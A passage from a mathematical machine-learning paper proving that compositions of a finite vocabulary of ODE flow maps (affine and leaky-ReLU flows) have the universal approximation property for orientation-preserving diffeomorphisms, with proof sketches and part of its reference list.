$d$, $$\begin{align*} \dot{x}(t) &= v(x(t), t), \quad t \in (0, \tau), \\ x(0) &= x_0 \in \mathbb{R}^d, \end{align*}$$ where $v : \mathbb{R}^d \to \mathbb{R}^d$ is the velocity field and $x_0$ is the initial value. When the field $v$ satisfies some conditions, such as Lipschitz continuous, the ODE (1) has a unique solution $x(t), t \in [0, \tau]$. Then the map from the initial state $x_0$ to $x(\tau)$, the state of the system after time $\tau$, is called the flow map. and denoted by \( \phi_{v(x,t)}^\tau(x_0) \), where \( x_0 \) is allowed to vary. A basic property is that the flow maps are naturally OP diffeomorphisms. For example, let \( A \) be a square matrix and \( v(x,t) = Ax \), then the flow map \( \phi_{v(x,t)}^\tau(x_0) \) is a linear map \( \phi_{Ax}^\tau(x_0) = e^{A\tau}x_0 \), where \( e^{A\tau} \) is the matrix exponential of \( A\tau \). A deeper introduction and understanding of flows and dynamical systems can be found in Chapter 1 of [Arrowsmith & Place, 1990]. ### 2.2 Notations For a (vector valued) function class \( F \), the vocabulary \( V \) is defined as a finite subset of \( F \), i.e., \[ V = \{ \phi_1, \phi_2, ..., \phi_n \} \subset F, \quad n \in \mathbb{Z}_+. \] (2) Each \( \phi_i \in V \) is called a word. We will consider a sequence of functions, \( \phi_{i_1}, \phi_{i_2}, ..., \phi_{i_m} \in V \), and their composition, called as a sentence, to generate the hypothesis function space, \[ H_V = \{ \phi_{i_1} \bullet \phi_{i_2} \bullet ... \bullet \phi_{i_m} | \phi_{i_1}, \phi_{i_2}, ..., \phi_{i_m} \in V, m \in \mathbb{Z}_+ \}. \] (3) Particularly, some (short) sentences are called phrases for some purpose. Here the operator \( \bullet \) is defined as function composition from left to right, which aligns the composition order to the writing order, i.e. \[ \phi_{i_1} \bullet \phi_{i_2} \bullet ... \bullet \phi_{i_m} = \phi_{i_m} \circ ... \circ \phi_{i_2} \circ \phi_{i_1} = \phi_{i_m}(...(\phi_{i_2}(\phi_{i_1}(\cdot)))...). \] (4) In additional, we use \( \phi^{\bullet m} \), to denote the mapping that composites \( \phi \) \( m \) times. In this paper, we consider two function classes: (1) \( C(\mathbb{R}^d, \mathbb{R}^d) \), continuous functions from \( \mathbb{R}^d \) to \( \mathbb{R}^d \), (2) \( \text{Diff}_0(\mathbb{R}^d) \), OP diffeomorphisms of \( \mathbb{R}^d \). Particularly, we will restrict the functions on a compact domain \( \Omega \subset \mathbb{R}^d \) and define the universal approximation property as below. **Definition 2.1** (Universal approximation property, UAP). For the compact domain \( \Omega \) in dimension \( d \), the target function space \( F \) and the hypothesis space \( H \), we say 1. \( H \) has \( C \)-UAP for \( F \), if for any \( f \in F \) and \( \varepsilon > 0 \), there is a function \( h \in H \) such that \[ \| f(x) - h(x) \| < \varepsilon, \quad \forall x \in \Omega. \] 2. \( H \) has \( L^p \)-UAP for \( F \), if for any \( f \in F \) and \( \varepsilon > 0 \), there is a function \( h \in H \) such that \[ \| f - h \|_{L^p(\Omega)} = \left( \int_\Omega |f(x) - h(x)|^p dx \right)^{1/p} < \varepsilon, \quad p \in [1, +\infty). \] ### 2.3 Main theorem Our main result is Theorem 2.2 and its Corollary 2.3, which show the existence of a finite function vocabulary \( V \) for the universal approximation property. **Theorem 2.2.** Let \( \Omega \subset \mathbb{R}^d \) be a compact domain. Then, there is a finite set \( V \subset \text{Diff}_0(\mathbb{R}^d) \) such that the hypothesis space \( H_V \) in Eq. (3) has \( C \)-UAP for \( \text{Diff}_0(\mathbb{R}^d) \). **Corollary 2.3.** Let \( \Omega \subset \mathbb{R}^d \) be a compact domain, \( d \geq 2 \) and \( p \in [1, +\infty) \). Then, there is a finite set \( V \subset C(\mathbb{R}^d, \mathbb{R}^d) \) such that the hypothesis space \( H_V \) in Eq. (4) has \( L^p \)-UAP for \( C(\mathbb{R}^d, \mathbb{R}^d) \). The Corollary 2.3 is based on the fact that OP diffeomorphisms can approximate continuous functions under the \( L^p \) norm provided the dimension is larger than two [Brenier & Gangbo, 2003]. Next, we only need to prove Theorem 2.2. **Remark 2.4.** We are considering functions to have the same dimension of the input and output, for simplicity. Our results can be directly extended to the case of different input and output dimensions. In fact, for \( f \in C(\mathbb{R}^{d_x}, \mathbb{R}^{d_y}) \), one can lift it as a function \( \tilde{f} \in C(\mathbb{R}^d, \mathbb{R}^d) \) with some \( d \geq \max(d_x, d_y) \). For example, let \( f = A_{in} \bullet \tilde{f} \bullet A_{out} \) where \( A_{in} \in C(\mathbb{R}^{d_x}, \mathbb{R}^d) \) and \( A_{out} \in C(\mathbb{R}^d, \mathbb{R}^{d_y}) \) are two fixed affine mappings. 2.4 Sketch of the proof Our proof for Theorem 2.2 is constructive, by concerning the flow maps of ODEs. In particular, our construction will use the following class of candidate flow maps in dimension \(d\), \[ H_1 = \{ \phi_{Ax+b} | A \in \mathbb{R}^{d \times d}, b \in \mathbb{R}^d, \tau \geq 0 \} \equiv \{ \phi : x \to e^{\tilde{A}x + \tilde{b}} | \tilde{A} \in \mathbb{R}^{d \times d}, \tilde{b} \in \mathbb{R}^d \}, \] \[ H_2 = \{ \phi_{\Sigma_{\alpha,\beta}(x)} | \alpha, \beta \in \mathbb{R}^d, \tau \geq 0 \} \equiv \{ \phi : x \to \Sigma_{\alpha,\beta}(x) | \tilde{\alpha}, \tilde{\beta} \in (0, +\infty)^d \}, \] where \( \Sigma_{\alpha,\beta} \) is the generalized leaky-ReLU functions defined as below. We say \( H_1 \) the affine flows and \( H_2 \) the leaky-ReLU flows. **Definition 2.5** (Generalized leaky-ReLU). Define the generalized leaky-ReLU function as \( \sigma_{\alpha,\beta} : \mathbb{R} \to \mathbb{R} \) and \( \Sigma_{\alpha,\beta} : \mathbb{R}^d \to \mathbb{R}^d \), with \( \alpha, \beta \in \mathbb{R}^d \), \( \alpha = (\alpha_1, ..., \alpha_d) \in \mathbb{R}^d \), \( \beta = (\beta_1, ..., \beta_d) \in \mathbb{R}^d \), \[ \sigma_{\alpha,\beta}(x) = \begin{cases} \alpha x, & x < 0 \\ \beta x, & x \geq 0 \end{cases}, \quad \Sigma_{\alpha,\beta}(x) = (\sigma_{\alpha_1,\beta_1}(x_1), ..., \sigma_{\alpha_d,\beta_d}(x_d)). \] Generalized leaky-ReLU functions are piecewise linear functions. Using this notation, the traditional ReLU and leaky-ReLU functions are \( \text{ReLU}(x) \equiv \sigma_0(x) \equiv \sigma_{0,1}(x) \) and \( \sigma_\alpha(x) \equiv \sigma_{\alpha,1}(x) \) with \( \alpha \in (0, 1) \), respectively. For vector input \( x \), we use \( \sigma_{\alpha,\beta} \) as an equivalent notation of \( \Sigma_{\alpha 1,\beta 1} \). We will show that the following set \( V \) meets our requirement for universal approximations, \[ V = \{ \phi_{\pm e_i}, \phi_{\pm E_{ij}x}, \phi_{\pm \Sigma_{e_i,0}(x)}, \phi_{\pm \Sigma_{0,e_i}(x)} | i, j \in \{1, 2, ..., d\}, \tau \in \{1, \sqrt{2}\} \}, \] where \( e_i \in \mathbb{R}^d \) is the \( i \)-th unit coordinate vector, \( E_{ij} \) is the \( d \times d \) matrix that has zeros in all entries except for a 1 at the index \((i, j)\). Obviously, \( V \subset \text{Diff}_0(\mathbb{R}^d) \) is a finite set with \( O(d^2) \) functions. **Theorem 2.6.** Let \( \Psi \in \text{Diff}_0(\Omega) \) be an orientation preserving diffeomorphism, \( \Omega \) be a compact domain \( \Omega \subset \mathbb{R}^d \). Then, for any \( \varepsilon > 0 \), there is a sequence of flow maps, \( \phi_1, \phi_2, ..., \phi_n \in V, n \in \mathbb{Z}_+ \), such that \[ \| \Psi(x) - (\phi_1 \bullet \phi_2 \bullet ... \bullet \phi_n)(x) \| \leq \varepsilon, \quad \forall x \in \Omega. \] Theorem 2.6 provides a constructive proof for Theorem 2.3. The proof of Theorem 2.6 can be separated into the following two parts. **Part 1:** Approximate each flow map in \( H_1 \) and \( H_2 \) by compositing a sequence of flow maps in \( V \). **Part 2:** Approximate \( \Psi \in \text{Diff}_0(\mathbb{R}^d) \) by compositing a sequence of flow maps in \( H_1 \cup H_2 \). Particularly, we approximate \( \Psi \) by \( g_L \) is of the form \[ g_L = h_0 \bullet h_1^* \bullet h_2 \bullet ... \bullet h_L^* \bullet h_L, \quad h_i \in H_1, h_i^* \in H_2, L \in \mathbb{Z}_+. \] The validation of such constructed \( V \) is technical and will be proved in Section 3 and Section 4. Here we only explain the main ideas. First of all, we note that to approximate a composition map \( T \), we only need to approximate each component in \( T \), which is detailed in the following Lemma 2.7. **Lemma 2.7.** Let map \( T = F_1 \bullet ... \bullet F_n \) be a composition of \( n \) continuous functions \( F_i \) defined on an open domain \( D_i \), and let \( \mathcal{F} \) be a continuous function class that can uniformly approximate each \( F_i \) on any compact domain \( K_i \subset D_i \). Then, for any compact domain \( K \subset D_1 \) and \( \varepsilon > 0 \), there are \( n \) functions \( \tilde{F}_1, ..., \tilde{F}_n \) in \( \mathcal{F} \) such that \[ \| T(x) - \tilde{F}_1 \bullet ... \bullet \tilde{F}_n(x) \| \leq \varepsilon, \quad \forall x \in K. \] For Part 1, the validation involves three techniques in math: the Lie product formula (Hall, 2015), the splitting method (Holden et al., 2010) and the Kronecker’s theorem (Apostol, 1990). We take \( \phi_b^1 \in H_1, b = \sum_{i=1}^d \beta_i e_i, \beta_i \geq 0 \), as an example to illustrate the main idea. Firstly, motivated by the Lie product formula or the splitting method, we can approximate \( \phi_b^1 \) by \[ \phi_b^1 \approx (\phi_{\beta_1 e_1}^{1/n} \bullet \phi_{\beta_2 e_2}^{1/n} \bullet ... \bullet \phi_{\beta_d e_d}^{1/n})^n, \quad n \in \mathbb{Z}_+, \] with \( n \) large enough. Secondly, each \( \phi_{\beta_i e_i}^{1/n} \) can be approximated by \[ \phi_{\beta_i e_i}^{1/n} \approx (\phi_{e_i}^{1})^{p_i} \bullet (\phi_{-e_i}^{1})^{q_i} \in \mathcal{H}_V, \quad p_i, q_i \in \mathbb{Z}_+. \] where \( p_i \) and \( q_i \) are non-negative integers such that \( |p_i - q_i \sqrt{2} - \beta_i/n| \) is small enough according to the Kronecker’s theorem (Apostol, 1990) as \( \sqrt{2} \) is an irrational number. Finally, \( \phi^t_b \) can be approximated by compositing a sequence of flow maps in \( V \). The case for \( \phi^t_{Ax+b} \) and \( \phi^t_{\Sigma_{\alpha,\beta}(x)} \) in \( H_1 \) and \( H_2 \) can be done in the same spirit. Then for Part 2, we note that the \( g_L \) we constructed in Eq. (10) is similar to a feedforward neural network \( g_L \) with width \( d \) and depth \( L \). The form of \( g_L \) is motivated by a recent work of Duan et al. (2022), which proved that vanilla feedforward leaky-ReLU networks with width \( d \) can be a discretization of dynamic systems in dimension \( d \). However, affine transformations in general networks are not necessarily OP diffeomorphisms, and one novelty of this paper is improving the technique to construct \( P_t \) as flow maps. Importantly, making them flow maps helps with employing the construction in Part 1. 3 PROOF OF THE CONSTRUCTION PART 1 To warm up, we show some flow maps of autonomous ODEs below, \[ \dot{x}(t) = b, \quad x(0) = x_0 \quad \Rightarrow \quad x(t) = \phi^t_b(x_0) = x_0 + bt, \] \[ \dot{x}(t) = Ax(t) + b, \quad x(0) = x_0 \quad \Rightarrow \quad x(t) = e^{At}x_0 + \int_0^t e^{A(t-\tau)}bd\tau, \] \[ \dot{x}(t) = a\sigma_0(x(t)), \quad x(0) = x_0 \quad \Rightarrow \quad x(t) = \phi^t_{a\sigma_0(x)}(x_0) = e^{at}\sigma_{e^{-at}}(x_0), \] \[ \dot{x}(t) = a\sigma_0(-x(t)), \quad x(0) = x_0 \quad \Rightarrow \quad x(t) = \phi^t_{a\sigma_0(-x)}(x_0) = \sigma_{e^{-at}}(x_0). \] Here \( \sigma_0 \) and \( \sigma_{e^{-at}} \) are ReLU and leaky-ReLU functions, respectively. Next, we provide some properties to verify a given map to be an affine flow map in \( H_1 \) or a leaky-ReLU flow map in \( H_2 \). 3.1 AFFINE FLOWS AND LEAKY-RELU FLOWS Consider the affine transformation \( P : x \rightarrow Wx + b \) and examine conditions of \( P \) to be a flow map. Generally, if \( W \) is nonsingular and has real matrix logarithm \( \ln(W) \), then \( P \) is an affine flow map, as we can represent \( P \) as \( P(x) = Wx + b = \phi^t_{Ax+b} \) where \( A = \ln(W) \) and \( b = \int_0^1 e^{A(\tau-1)}bd\tau \). As it is hard to verify \( \ln(W) \) is a real matrix (Culver, 1966), we are happy to construct some special matrix \( W \). The following properties are useful. **Proposition 3.1.** (1) Let \( Q \) be a nonsingular matrix. If \( x \rightarrow Wx \) is an affine flow map then the map \( x \rightarrow QWQ^{-1}x, x \rightarrow WTx \) and \( x \rightarrow W^{-1}x \) also are. (2) Let \( U \) be an upper triangular matrix below with \( \lambda > 0 \), then the map \( x \rightarrow Ux \) is an affine flow map for arbitrary vector \( w_{2:d} \), \[ U = \begin{pmatrix} \lambda & w_{2:d} \\ 0 & I_{d-1} \end{pmatrix}. \] Here \( I_{d-1} \) is the \((d-1)\)th order identity matrix. The property (1) is because \( \ln(QWQ^{-1}) = Q\ln(W)Q^{-1} \) and \( \ln(W^T) = \ln(W)^T \). The property (2) can be obtained by employing the formula, \[ \ln \begin{pmatrix} \lambda & w_{2:d} \\ 0 & I_{d-1} \end{pmatrix} = \begin{pmatrix} \ln(\lambda) & \frac{\ln(\lambda)}{\lambda-1}w_{2:d} \\ 0 & 0 \end{pmatrix}, \quad \lambda \neq 1. \] When \( \lambda = 1 \), the formula is simplified as \( \ln(U) = U - I_d \). Next, we consider the leaky-ReLU flow maps. By directly calculate the flow map \( \phi^t_{\Sigma_{\alpha,\beta}(x)} \) with \( \alpha, \beta \in \mathbb{R}^d \), we have \[ \phi^t_{\Sigma_{\alpha,\beta}(x)}(x) = \Sigma_{\tilde{\alpha},\tilde{\beta}}(x), \] where \( \tilde{\alpha} = (e^{\tau\alpha_1},...,e^{\tau\alpha_d}) \) and \( \tilde{\beta} = (e^{\tau\beta_1},...,e^{\tau\beta_d}) \). The following property is implied. **Proposition 3.2.** If \( \tilde{\alpha}, \tilde{\beta} \in (0, \infty)^d \), then the map \( \Sigma_{\tilde{\alpha},\tilde{\beta}} \) is a leaky-ReLU flow map. 3.2 Application of Lie product formula **Theorem 3.3** (Lie product formula). For all matrix \( A, B \in \mathbb{R}^{d \times d} \), we have \[ e^{A+B} = \lim_{n \to \infty} \left( e^{A/n} e^{B/n} \right)^n = \lim_{n \to \infty} \left( \phi_{Ax}^{1/n} \bullet \phi_{Bx}^{1/n} \right)^n \] Here \( e^A \) denotes the matrix exponential of \( A \), which is also the flow map \( \phi_{Ax}^t \) of the autonomous system \( x'(t) = Ax(t) \). The proof can be found in Hall (2015) for example and the formula can be extended to multi-component cases. The formula can also be derived from the operator splitting approach (Holden et al., 2010), which allows us to obtain the following result. **Lemma 3.4.** Let \( v_i : \mathbb{R}^d \to \mathbb{R}^d, i = 1, 2, ..., m \) be Lipschitz continuous functions, \( v = \sum_{i=1}^m v_i, \Omega \) be a compact domain. For any \( t > 0 \) and \( \varepsilon > 0 \), there is a positive integer \( n \), such that the flow map \( \phi_v^t \) can be approximated by composition of flow maps \( \phi_{v_i}^{t/n} \), i.e. \[ \| \phi_v^t(x) - (\phi_{v_1}^{t/n} \bullet \phi_{v_2}^{t/n} \bullet ... \bullet \phi_{v_m}^{t/n})^n(x) \| < \varepsilon, \quad \forall x \in \Omega. \] 3.3 Application of Kronecker’s theorem **Theorem 3.5** (Kronecker’s approximation theorem (Apostol, 1990)). Let \( \gamma \in \mathbb{R} \) be an irrational number, then for any \( t \in \mathbb{R} \) and \( \varepsilon > 0 \), there exist two integers \( p \) and \( q \) with \( q > 0 \), such that \( |\gamma q + p - t| < \varepsilon \). Although Kronecker’s Theorem is proposed for approximating real numbers, we can employ it in the scenario of approximating the flow map \( \phi_v^t \) as it contains a real-time parameter \( t \). Choosing \( \gamma = -\sqrt{2} \), approximating \( t \) by \( p - q\sqrt{2} \), then we can approximate \( \phi_v^t \) by \( \phi_v^{p-q\sqrt{2}} \). Considering positive \( t \), we have \( p \) is positive as \( q \) is. Then the property of flow maps, \[ \phi_v^{p-q\sqrt{2}} = \phi_v^p \bullet \phi_v^{-q\sqrt{2}} = \phi_v^p \bullet \phi_{-\sqrt{2}}^q = (\phi_v^1)^p \bullet (\phi_{-\sqrt{2}})^q, \] allow us to prove the following result. **Lemma 3.6.** Let \( v : \mathbb{R}^d \to \mathbb{R}^d \) be a Lipschitz continuous function, \( \Omega \) be a compact domain. For any \( t > 0 \) and \( \varepsilon > 0 \), there exist two positive integers \( p \) and \( q \), such that the flow map \( \phi_v^t \) can be approximated by \( (\phi_v^1)^p \bullet (\phi_{-\sqrt{2}})^q \), i.e. \[ \| \phi_v^t(x) - (\phi_v^1)^p \bullet (\phi_{-\sqrt{2}})^q(x) \| < \varepsilon, \quad \forall x \in \Omega. \] **Corollary 3.7.** For any flow maps \( h \) in \( H_1 \cup H_2 \), \( \varepsilon > 0 \) and compact domain \( \Omega \subset \mathbb{R}^d \), there is a sequence \( \phi_1, \phi_2, ..., \phi_m \) in \( V \) (Eq. [8]) such that \[ \| h(x) - (\phi_1 \bullet \phi_2 \bullet ... \bullet \phi_m)(x) \| < \varepsilon, \quad \forall x \in \Omega. \] The result is obtained by directly employing Lemma 3.4 and Lemma 3.6 with the following splittings, \[ Ax + b = \sum_{i=1}^d \sum_{j=1}^d a_{ij} E_{ij} x + \sum_{i=1}^d b_i e_i, \quad \Sigma_{\alpha,\beta}(x) = \sum_{i=1}^d \alpha_i \Sigma_{e_i,0}(x) + \sum_{i=1}^d \beta_i \Sigma_{0,e_i}(x). \] 4 Proof of the construction Part 2 This section provides the construction that OP diffeomorphisms can be approximated by compositing a sequence of flow maps in \( H_1 \cup H_2 \). The construction contains three steps: (1) approximate OP diffeomorphisms by deep compositions using the splitting approach, (2) approximate each splitting component by compositing flow maps in \( H_1 \cup H_2 \), (3) combine results to finish the construction. 4.1 Approximate the OP diffeomorphism by deep compositions Employing results of Agrachev & Caponigro (2010) and Caponigro (2011), any OP diffeomorphism \( \Psi \) can be approximated by flow maps of ODEs. Particularly, we can choose the ODEs as neural ODEs of the form \[ x'(t) = v(x(t), t) = \sum_{i=1}^{N} s_i(t) \sigma(w_i(t) \cdot x(t) + b_i(t)), \] (27) where the field function \( v \) is a neural network with \( N \) hidden neurons, the activation is chosen as the leaky-ReLU function \( \sigma = \sigma_\alpha \) for some \( \alpha \in (0, 1) \), \( s_i \in \mathbb{R}^d \), \( w_i \in \mathbb{R}^d \) and \( b_i \in \mathbb{R} \) are piecewise smooth functions of \( t \). The universal approximation property of neural networks [Cybenko (1989)] implies that \( \Psi \) can be approximated by the flow map \( \phi^\tau \) of Eq. (27) for some \( \tau > 0 \) and \( N \in \mathbb{Z}_+ \) big enough. Following the approach of [Duan et al. (2022)], we employ a proper splitting numerical scheme to discretize the neural ODE (27). Split the field \( v \) as a summation of \( Nd \) functions, \( v(x, t) = \sum_{i=1}^{N} \sum_{j=1}^{d} v_{ij}(x, t)e_j \), where \( e_j \) is the \( j \)-th axis unit vector and \( v_{ij}(x, t) = s_{ij}(t) \sigma(w_{ij}(t) \cdot x + b_{ij}(t)) \) are scalar functions. Then the numerical analysis theory of splitting methods [Holden et al. (2010)] ensures that the following composition \( \Phi \) can approximate \( \phi^\tau \) provided the time step \( \Delta t := \tau/n \) is sufficiently small, \[ \Phi = T_1 \bullet \cdots \bullet T_n \equiv (T_1^{(1,1)} \bullet T_1^{(1,2)} \bullet \cdots \bullet T_1^{(N,d)}) \bullet \cdots \bullet (T_n^{(1,1)} \bullet T_n^{(1,2)} \bullet \cdots \bullet T_n^{(N,d)}), \] where the map \( T_k^{(i,j)} : x \rightarrow y \) in each split step is \[ \begin{cases} y^{(l)} = x^{(l)}, & l \neq j, \\ y^{(j)} = x^{(j)} + \Delta t v_{ij}(x, k\Delta t). \end{cases} \] (28) Here, the superscript in \( x^{(l)} \) indicates the \( l \)-th coordinate of \( x \). The map \( T_k^{(i,j)} \) is given by the forward Euler discretization of \( x'(t) = v_{ij}(x(t), t)e_j \) in the interval \((k\Delta t, (k + 1)\Delta t)\). Note that \( v_{ij} \) is Lipschitz continuous on \( \mathbb{R}^d \), hence the map \( T_k^{(i,j)} \) also is. Below is the formal statement of the approximation in this step. **Theorem 4.1.** Let \( \Psi \in \text{Diff}_0(\Omega) \) be an orientation preserving diffeomorphism, \( \Omega \) be a compact domain \( \Omega \subset \mathbb{R}^d \). Then, for any \( \varepsilon > 0 \), there is a sequence of transformations, \( T_k^{(i,j)} \), is of the form Eq. (28) such that \[ \| \Psi(x) - (T_1^{(1,1)} \bullet T_1^{(1,2)} \bullet \cdots \bullet T_1^{(N,d)} \bullet \cdots \bullet T_n^{(1,1)} \bullet T_n^{(1,2)} \bullet \cdots \bullet T_n^{(N,d)})(x) \| \leq \varepsilon, \quad \forall x \in \Omega. \] ### 4.2 Approximate Each Composition Component by Flow Maps in \( H_1 \) and \( H_2 \) Now we examine the map \( T_k^{(i,j)} \) in each splitting step. Since all \( T_k^{(i,j)} \) have the same structure (over a permutation), we only need to consider the case of \( T_k^{(N,d)} \), which is simply denoted as \( T : x \rightarrow y \) is of the form \[ T : \begin{cases} y^{(i)} = x^{(i)}, & i = 1, \cdots, d-1, \\ y^{(d)} = x^{(d)} + a \sigma(w_1 x^{(1)} + \cdots + w_d x^{(d)} + b). \end{cases} \] (29) where \( \sigma = \sigma_\alpha, \alpha \in (0, 1) \), is the leaky-ReLU function, \( a, b, w_1, ..., w_d \in \mathbb{R} \) are parameters. Since the time step \( \Delta t \) in \( T_k^{(i,j)} \) are small, we can assume the parameters satisfying \( \max(1/\alpha, \alpha)|aw_d| < 1 \). **Lemma 4.2.** Let \( \alpha > 0 \) and \( \max(1/\alpha, \alpha)|aw_d| < 1 \), then the map \( T \) in Eq. (29) is a composition of at most six flow maps in \( H_1 \cup H_2 \). Noting that the case of \( w_1 = ... = w_{d-1} = 0 \) is trivial, we can assume \( w_1 \neq 0 \) without loss of generality. Then, the bias parameter \( b \) can be absorbed in \( x^{(1)} \) using an affine flow map; hence we only need to consider the case of \( b = 0 \). In addition, using the property of leaky-ReLU, \( \sigma_\alpha(x) = -\alpha \sigma_{1/\alpha}(-x) \), we can further assume \( w_1 > 0 \). As a result, the map \( T \) can be represented by the following composition, \[ T(x) = F_0 \bullet F_1 \bullet \cdots \bullet F_5(x), \] (30) where each composition step is as follows, \[ \begin{pmatrix} x^{(1)} \\ x^{(2:d-1)} \\ x^{(d)} \end{pmatrix} \xrightarrow{F_0} \begin{pmatrix} \nu \\ x^{(2:d-1)} \\ x^{(d)} \end{pmatrix} \xrightarrow{F_1} \begin{pmatrix} \sigma(\nu) \\ x^{(2:d-1)} \\ x^{(d)} \end{pmatrix} \xrightarrow{F_2} \begin{pmatrix} \sigma(\nu) \\ x^{(2:d-1)} \\ x^{(d)} + a\sigma(\nu) \end{pmatrix} \xrightarrow{F_3} \begin{pmatrix} \nu \\ x^{(2:d-1)} \\ x^{(d)} + a\sigma(\nu) \end{pmatrix} \xrightarrow{F_4} \begin{pmatrix} \nu + w_d a \sigma(\nu) \\ x^{(2:d-1)} \\ x^{(d)} + a\sigma(\nu) \end{pmatrix} \xrightarrow{F_5} \begin{pmatrix} x^{(1)} \\ x^{(2:d-1)} \\ x^{(d)} + a\sigma(\nu) \end{pmatrix}. \] Here, \( \nu := w_1 x^{(1)} + \cdots + w_d x^{(d)} \) and \( x^{(2:d-1)} \) represent the elements \( x^{(2)}, \ldots, x^{(d-1)} \). We clarify that each component \( F_i, i = 0, \cdots, 5 \), are flow maps in \( H_1 \cup H_2 \). In fact, \( F_0, F_2, F_5 = F_0^{-1} \) are affine mappings, \[ F_0(x) = \begin{pmatrix} w_1 & w_{2:d} \\ 0 & I_{d-1} \end{pmatrix} x, \quad F_2(x) = \begin{pmatrix} I_{d-1} & 0 \\ (a, 0_{2:d-1}) & 1 \end{pmatrix} x, \quad F_5(x) = \begin{pmatrix} 1/w_1 & -w_{2:d}/w_1 \\ 0 & I_{d-1} \end{pmatrix} x, \] where \( I_{d-1} \) is the identity matrix, \( (a, 0_{2:d-1}) = (a, 0, \ldots, 0) \) with \( d-2 \) zeros. According to Proposition [3.1], they are flow maps in \( H_1 \). In addition, according to Proposition [3.2], \( F_1, F_3 \) and \( F_4 \) are leaky-ReLU flow maps in \( H_2 \) as \[ F_1 = \Sigma_{(\alpha, 1_{2:d}), 1_{1:d}}, \quad F_3 = \Sigma_{(1/\alpha, 1_{2:d}), 1_{1:d}}, \quad F_4 = \Sigma_{(1+w_d a \alpha, 1_{2:d}), (1+w_d a, 1_{2:d})}. \] Here, the condition \( \max(1/\alpha, \alpha)|aw_d| < 1 \) is used to ensure \( 1 + w_d a \alpha > 0 \) and \( 1 + w_d a > 0 \). ### 4.3 Finish the construction Combining Theorem [4.1] and Lemma [4.2] above, and using the fact in Lemma [2.7], we have the following result. **Theorem 4.3.** Let \( \Psi \in \text{Diff}_0(\Omega) \) be an orientation preserving diffeomorphism, \( \Omega \) be a compact domain \( \Omega \subset \mathbb{R}^d \). Then, for any \( \varepsilon > 0 \), there is a sequence of flow maps, \( h_1, h_2, \ldots, h_m, m \in \mathbb{Z}_+ \), in \( H = H_1 \cup H_2 \) such that \[ ||\Psi(x) - (h_1 \bullet h_2 \bullet \ldots \bullet h_m)(x)|| \leq \varepsilon, \quad \forall x \in \Omega. \] Then we can finish the construction for Theorem [2.6] by combining Corollary [3.7] and Theorem [4.3]. ### 5 Conclusion Universal approximation properties are the foundation for machine learning. This paper examined the approximation property of mapping composition from a sequential perspective. We proved, for the first time, that the universal approximation for diffeomorphisms and high-dimensional continuous functions can be achieved by using a finite number of sequential mappings. Our result implies that the universal approximations can be easily achieved. Importantly, the mappings used in our composition are flow maps of dynamical systems and do not increase the dimensions. However, our result is restricted to mappings on a compact domain. It is interesting to study whether it is possible to generalize this result to the case of mappings on unbounded domains. Our Theorem [2.2] was inspired by the fact of finite vocabulary in natural languages, where \( V \) can be mimicked to a “vocabulary”, \( H_1 \) and \( H_2 \) to “phrases”, and \( H_V \) to “sentences”. Our results provide a novel aspect for composite mappings, and we hope our findings could in turn inspire related research for the algorithm and modeling communities. For example, one can embed words as nonlinear mappings instead of vectors or matrices in traditional models. However, constructing such embedding models involves lots of techniques that are beyond the scope of this paper. It should be noted that this paper focuses on the existence of a finite vocabulary and the constructed \( V \) in Eq. (8) is not optimal. If a sequential composition of mappings in such \( V \) is used to approximate functions in practical applications, the required sequence length may be extremely large. However, in practical applications, it is often only necessary to approximate a certain small set of continuous functions, hence designing an efficient vocabulary for them would be a fascinating future direction. REFERENCES A. A. Agrachev and M. Caponigro. Dynamics control by a time-varying feedback. *Journal of Dynamical and Control Systems*, 16(2):149–162, 2010. Tom M. Apostol. Kronecker’s theorem with applications. In *Modular Functions and Dirichlet Series in Number Theory*, Graduate Texts in Mathematics, pp. 142–160. Springer, New York, NY, 1990. David K Arrowsmith and Colin M Place. *An introduction to dynamical systems*. Cambridge university press, 1990. Shima Asaadi, Eugenie Giesbrecht, and Sebastian Rudolph. Compositional matrix-space models of language: Definitions, properties, and learning methods. *Natural Language Engineering*, 29(1):32–80, 2023. Hans-Peter Beise and Steve Dias Da Cruz. Expressiveness of Neural Networks Having Width Equal or Below the Input Dimension. *arXiv preprint arXiv:2011.04923*, November 2020. Yann Brenier and Wilfrid Gangbo. $L^p$ Approximation of maps by diffeomorphisms. *Calculus of Variations and Partial Differential Equations*, 16(2):147–164, February 2003. ISSN 0944-2669, 1432-0835. Tom Brown, Benjamin Mann, Nick Ryder, Melanie Subbiah, Jared D. Kaplan, Prafulla Dhariwal, Arvind Neelakantan, Pranav Shyam, Girish Sastry, and Amanda Askell. Language models are few-shot learners. In *Advances in neural information processing systems*, volume 33, pp. 1877–1901, 2020. Yongqiang Cai. Achieve the minimum width of neural networks for universal approximation. *arXiv preprint arXiv:2209.11395*, 2022. Marco Caponigro. Orientation preserving diffeomorphisms and flows of control-affine systems. *IFAC Proceedings Volumes*, 44(1):8016–8021, 2011. Lili Chen, Kevin Lu, Aravind Rajeswaran, Kimin Lee, Aditya Grover, Misha Laskin, Pieter Abbeel, Aravind Srinivas, and Igor Mordatch. Decision transformer: Reinforcement learning via sequence modeling. *Advances in neural information processing systems*, 34:15084–15097, 2021. Ricky T. Q. Chen, Yulia Rubanova, Jesse Bettencourt, and David Duvenaud. Neural ordinary differential equations. In *Proceedings of the 32nd International Conference on Neural Information Processing Systems*, pp. 6572–6583, 2018. Walter J. Culver. On the existence and uniqueness of the real logarithm of a matrix. *Proceedings of the American Mathematical Society*, 17(5):1146–1151, 1966. George Cybenko. Approximation by superpositions of a sigmoidal function. *Mathematics of control, signals and systems*, 2(4):303–314, 1989. George Cybenkot. Approximation by superpositions of a sigmoidal function. *Mathematics of Control, Signals and Systems*, 2(4):303–314, 1989. Verna Dankers, Elia Bruni, and Dieuwke Hupkes. The paradox of the compositionality of natural language: A neural machine translation case study. In *Proceedings of the 60th Annual Meeting of the Association for Computational Linguistics (Volume 1: Long Papers)*, pp. 4154–4175. Association for Computational Linguistics, 2022. Jacob Devlin, Ming-Wei Chang, Kenton Lee, and Kristina Toutanova. BERT: Pre-training of Deep Bidirectional Transformers for Language Understanding. *arXiv preprint arXiv:1810.04805*, 2018. Alexey Dosovitskiy, Lucas Beyer, Alexander Kolesnikov, Dirk Weissenborn, Xiaohua Zhai, Thomas Unterthiner, Mostafa Dehghani, Matthias Minderer, Georg Heigold, Sylvain Gelly, Jakob Uszkoreit, and Neil Houlsby. An image is worth 16x16 words: Transformers for image recognition at scale. In *International Conference on Learning Representations*, 2021. Yifei Duan, Li’ang Li, Guanghua Ji, and Yongqiang Cai. Vanilla feedforward neural networks as a discretization of dynamic systems. *arxiv*, 2022.
